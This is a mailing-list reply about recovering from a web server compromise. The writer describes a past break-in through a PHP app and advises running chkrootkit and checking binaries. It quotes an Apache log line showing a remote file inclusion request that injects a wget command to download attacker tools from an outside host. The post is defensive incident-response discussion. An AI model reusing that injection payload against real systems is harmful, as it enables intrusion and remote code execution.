 |
Home
| Calendar
| Mail Lists
| List Archives
| Desktop SIG
| Hardware Hacking SIG
Wiki | Flickr | PicasaWeb | Video | Maps & Directions | Installfests | Keysignings Linux Cafe | Meeting Notes | Linux Links | Bling | About BLU |
|
Home
| Calendar
| Mail Lists
| List Archives
| Desktop SIG
| Hardware Hacking SIG
Wiki | Flickr | PicasaWeb | Video | Maps & Directions | Installfests | Keysignings Linux Cafe | Meeting Notes | Linux Links | Bling | About BLU |
David Kramer wrote: >Anything else I should try? > >Should I panic more than I am? Right now I feel strongly this was a >benign "stupid Apache tricks" thing, and I need to find the hole and close >it, but no need to nuke the server and start over. > > > To add to my off-list comments... I'm a little hazy on the details as this was a while ago, but here's what we found after the hacker had exploited a _known_ gaping hole in a php app one of our users was running: * They had dropped a false shell into /var/tmp that ran under the apache user -- I think it listened on some funny port - and we discovered it when we went to bounce apache and got some weird message * They tried to compile an irc bot (go figure) * Apache logs had the evidence: Several instances of this: ./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" Nasty. I ran chkrootkit and it didn't find anything. I also did checksums against a lot of local binaries compared to known good ones to make sure they were the originals. I bet you are right that it's an apache-only thing, but I would be _really_ sure. I would also leave apache (and perhaps other daemons as well) down until you are sure you found the problem. Our offender came back once or twice more unsuccessfully.
